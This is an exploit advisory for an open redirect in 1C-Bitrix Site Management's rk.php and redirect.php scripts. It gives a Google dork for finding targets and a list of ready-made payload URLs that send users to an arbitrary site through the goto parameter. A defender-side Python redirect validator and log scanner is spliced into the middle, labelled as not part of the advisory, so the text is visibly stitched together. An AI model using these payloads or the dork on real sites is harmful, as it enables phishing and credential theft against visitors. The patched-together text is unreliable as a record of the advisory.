####################################################################
# Exploit Title : 1C-Bitrix Site Management Russia 2.0 Open Redirection
# Author [ Discovered By ] : KingSkrupellos
# Team : Cyberizm Digital Security Army
# Date : 05/03/2019
# Vendor Homepages : 1c-bitrix.ru ~ bitrix24.com
# Software Information Link : 1c-bitrix.ru/support/
dev.1c-bitrix.ru/support/forum/forum6/topic68319/
dev.1c-bitrix.ru/community/forums/forum6/topic115703/
dev.1c-bitrix.ru/api_help/main/functions/other/localredirect.php
training.bitrix24.com/support/training/course/?COURSE_ID=68&CHAPTER_ID=05937&LESSON_PATH=5936.5937
# Software Affected Version : 2.0 - 6.5 and previous versions
# Software Price Type : Paid Download
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : High
# Google Dorks : intext:Powered by Bitrix24. Copyright © 2002-2016 Bitrix
# Vulnerability Type : CWE-601 [ URL Redirection to Untrusted Site ('Open Redirect') ]
# PacketStormSecurity : packetstormsecurity.com/files/authors/13968
# CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
# Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
####################################################################
# Description about Software :
***************************
Bitrix Site Manager (the edition for Russian websites) is a software core for the comprehensive
management of web projects of any complexity.
Bitrix24 is a ready-made product for building a company's corporate portal, with the
option of customizing the standard functionality to the company's needs.
####################################################################
# Impact :
*********
This web application, Bitrix Russia Site Management 2.0, accepts user-controlled
input that specifies a link to an external site and uses that link in a redirect.
This simplifies phishing attacks: an HTTP parameter may contain a URL value and cause
the web application to redirect the request to that URL. By changing the URL value
to point at a malicious site, an attacker can launch a phishing scam and steal user credentials.
Because the server name in the modified link is identical to the original site, phishing attempts
have a more trustworthy appearance.
An open redirect is a failure in that process which makes it possible for attackers to
steer users to malicious websites. The vulnerability is used in phishing attacks to get users
to visit malicious sites without realizing it. Web users often encounter redirection when they
visit the website of a company whose name has changed or which has been acquired
by another company. When the user lands on the fake page, their computer can be infected with
malware whose purpose is to deceive the legitimate user and steal personal data.
______________________________________________________________________
Note : According to the Bitrix24 Company =>
rk.php - a file used by the Advertising module by default to record banner click events.
redirect.php - a file used by the Statistics module to record link click events.
More information can be found at this link =>
training.bitrix24.com/support/training/course/?COURSE_ID=68&LESSON_ID=5945
####################################################################
# Open Redirection Exploit :
**************************
/bitrix/rk.php?goto=https://www.[REDIRECTION-ADDRESS].gov
/bitrix/redirect.php?event1=&event2=&event3=&goto=https://www.[REDIRECTION-ADDRESS].gov
/bitrix/redirect.php?event3=352513&goto=https://www.[REDIRECTION-ADDRESS].gov
/bitrix/redirect.php?event1=demo_out&event2=sm_demo&event3=pdemo&goto=https://www.[REDIRECTION-ADDRESS].gov
/bitrix/redirect.php?site_id=s1&event1=select_product_t1&event2=contributions&goto=https://www.[REDIRECTION-ADDRESS].gov
bitrix/redirect.php?event1=&event2=&event3=download&goto=https://www.[REDIRECTION-ADDRESS].gov
/bitrix/rk.php?id=28&site_id=s2&event1=banner&event2=click&event3=3+%2F+%5B28%5D+%5BBANNER_AREA_FOOTER2%5D+%D0%9F%D0%BE%D1%81%D0%B5%D1%82%D0%B8%D1%82%D0%B5+%D0%B2%D0%B2%D0%BE%D0%B4%D0%BD%D1%83%D1%8E+%D0%B1%D0%B5%D1%81%D0%BF%D0%BB%D0%B0%D1%82%D0%BD%D1%83%D1%8E+%D0%BB%D0%B5%D0%BA%D1%86%D0%B8%D1%8E+APTOS&goto=https://www.[REDIRECTION-ADDRESS].gov
/bitrix/rk.php?id=84&site_id=n1&event1=banner&event2=click&event3=1+%2F+%5B84%5D+%5BMOBILE_HOME%5D+Love+Card&goto=https://www.[REDIRECTION-ADDRESS].gov
/bitrix/rk.php?id=691&site_id=s3&event1=banner&event2=click&event3=1+%2F+%5B691%5D+%5BNEW_INDEX_BANNERS%5D+Trade-in+football&goto=https://www.[REDIRECTION-ADDRESS].gov
/bitrix/rk.php?id=129&event1=banner&event2=click&event3=5+%2F+%5B129%5D+%5BGARMIN_AKCII%5D+Garmin+%E1%EE%ED%F3%F1+%ED%EE%E2%EE%F1%F2%FC+%E2+%E0%EA%F6%E8%E8&goto=https://www.[REDIRECTION-ADDRESS].gov
bitrix/redirect.php?event1=%D0%A1%D0%BF%D0%B5%D1%86%D0%B8%D0%B0%D0%BB%D1%8C%D0%BD%D1%8B%D0%B5+%D0%B4%D0%BE%D0%BA%D0%BB%D0%B0%D0%B4%D1%8B&event2=&event3=download&goto=https://www.[REDIRECTION-ADDRESS].gov
/bitrix/redirect.php?event1=%D0%A1%D0%BF%D0%B5%D1%86%D0%B8%D0%B0%D0%BB%D1%8C%D0%BD%D1%8B%D0%B5+%D0%B4%D0%BE%D0%BA%D0%BB%D0%B0%D0%B4%D1%8B&event2=&event3=download&goto=https://www.[REDIRECTION-ADDRESS].gov
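A defender-side check, added here as an example and not code from this advisory or from Bitrix: a Python allow-list validator of the kind a hardened rk.php/redirect.php handler should apply to the goto parameter, plus a scan of access-log lines that flags hits on those two scripts whose goto leaves the site. The site hostname (example.com), the log lines and the phishing host are assumed or constructed values.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

SITE_HOST = "example.com"  # assumed hostname of the Bitrix installation

# Constructed Apache combined-format lines; IPs and hosts are documentation values.
SAMPLE_LOG = [
    '203.0.113.5 - - [05/Mar/2019:10:00:01 +0300] "GET /bitrix/redirect.php?event1=&event2=&event3=download&goto=https%3A%2F%2Fphish.example.net%2Flogin HTTP/1.1" 302 0 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [05/Mar/2019:10:00:02 +0300] "GET /bitrix/rk.php?id=28&site_id=s1&goto=%2Fcatalog%2F HTTP/1.1" 302 0 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [05/Mar/2019:10:00:03 +0300] "GET /bitrix/rk.php?id=84&goto=//phish.example.net HTTP/1.1" 302 0 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [05/Mar/2019:10:00:04 +0300] "GET /index.php?goto=https://phish.example.net HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
]

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "\S+ (?P<path>\S+) [^"]*" (?P<status>\d{3})')
REDIRECT_SCRIPTS = {"/bitrix/rk.php", "/bitrix/redirect.php"}


def is_safe_redirect(target: str, site_host: str = SITE_HOST) -> bool:
    """Allow-list check a hardened redirect handler should apply to `goto`.

    Accepts only site-relative paths or https URLs on our own host; rejects
    other hosts, scheme-relative '//host' forms, backslashes and control
    characters (which some browsers or parsers treat as separators).
    """
    target = unquote(target)  # catch double-encoded values such as %2F%2Fhost
    if "\\" in target or any(ord(c) < 0x20 for c in target):
        return False
    parts = urlsplit(target)
    if parts.scheme or parts.netloc:
        return parts.scheme == "https" and parts.hostname == site_host
    return target.startswith("/") and not target.startswith("//")


def find_offsite_redirects(log_lines, site_host: str = SITE_HOST):
    """Return (ip, status, goto) for rk.php/redirect.php hits whose goto leaves the site."""
    hits = []
    for line in log_lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        url = urlsplit(m["path"])
        if url.path not in REDIRECT_SCRIPTS:
            continue  # goto only matters on the two redirecting scripts
        for goto in parse_qs(url.query).get("goto", []):
            if not is_safe_redirect(goto, site_host):
                hits.append((m["ip"], m["status"], goto))
    return hits


if __name__ == "__main__":
    for ip, status, goto in find_offsite_redirects(SAMPLE_LOG):
        print(f"off-site redirect from {ip}: goto={goto!r} (HTTP {status})")
```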
####################################################################
# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
####################################################################